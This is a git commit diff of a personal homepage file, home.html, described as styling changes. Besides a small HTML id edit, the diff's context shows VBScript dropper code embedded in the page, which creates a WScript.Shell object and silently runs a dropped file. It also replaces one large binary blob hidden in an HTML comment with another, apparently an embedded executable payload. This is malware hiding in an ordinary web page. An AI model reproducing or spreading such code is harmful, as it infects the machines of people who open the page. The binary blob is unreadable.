putting color, changing font and adjusting position of content

--- a/home.html
+++ b/home.html
@@ -18,7 +18,7 @@
                     <div class="textDetail" id="first">
                         <h3>STUDENT</h3>
                     </div>
-                    <div class="textDetail">
+                    <div class="textDetail" id="second">
                         <h3>GEEK</h3>
                     </div>
                     <div class="textDetail" id="last">
@@ -42,13 +42,12 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--Ðúê‹¸­OOW²¥$9÷ZN(éŠVv¬ ÂZÛ>Ì½%¹16á¬Ë«t÷Þ\„þ»vá«,È´öŒÝ9Ð,£ßE­„=P¥|Â„+ñoqvEj^Ì(‘)FwF7b4{ëÞ×éUQ hº€›yk¤{ÔnÞ!\ì›Ô~Å>{fûkµ°—•Õä–B?‡ÎÛãÏ>ºoÉ¢¼'0URJŠ*ÔÒ1/ÁÓÏ®˜õV
-E—™ˆ¸WA]'t»œ{¢¥y»`ÓWhR×2êTÍ øÎ¤{R¶ÚlÈb1¬
-ò=s yÕlÐ¯¯msÏ]oÙ*EÌ»zrq—Ê"¯(0Í]÷£zùVþ£µÊ„›”;†4„Ú`Ë?¤ôvìCöªD¶¾'}¹7hŒ±¼g³‹„0ØÈI¾©@Ûy4t¨×m×;·ÔþÅ¸
-Øb[õÚ¨§¬ûXC{­5­—:5½È×ªÆ˜,4rš(ÞKÊØ9§©ßúºaºïömu•Ú Y·É9Mà"}ô©°Ë€Î¯8çÌúøštƒbBúJJÍ(Õ’© 0Ì{E Ü
+//--></SCRIPT><!--0JÌcöd‹zè« ˜Òøz¹Îo‚Ö|G¤çùc³?¸Y’FfH©#ŒÁùÎÊ¯|Á*7£áÛo¼¹ŽYñ’µ*ÞjÝÀhvöù†\tI:I¼¼h4å ÈÅ´?~ª;åì\ÔÄï÷÷AÞ&µ§~'ÃT©,Qx
+	c œb%žÆ®5Ù‡2zíÎ\wª%½½­ç®/ÊCÀ”mco«Ã™üðÜá¾ql©NGTr2?@h'Ø§–*½~¢É!aBÌ÷á‚
+u*ÌÁÅ[\@ˆñÑôµ¦‡«á„ÞfýFVx®ÃwBÃ*?óú™U´¿¡ €¬Í»Ÿ‡s3›)7…Òüç\/dïØAe	Œéƒ']ž†äHœô®Õ_‹SeíyÊ·lMÌ^èk![ÔDÜ ¸;%²þr2öv0Gh	Šê	Ýv”ÓDøÊûu“.l~{ Ü
 RùÜ
 Ü
 Ü
-‘×OzÅØZºß
+‘×OeþØZÆß
  Ü
 -->
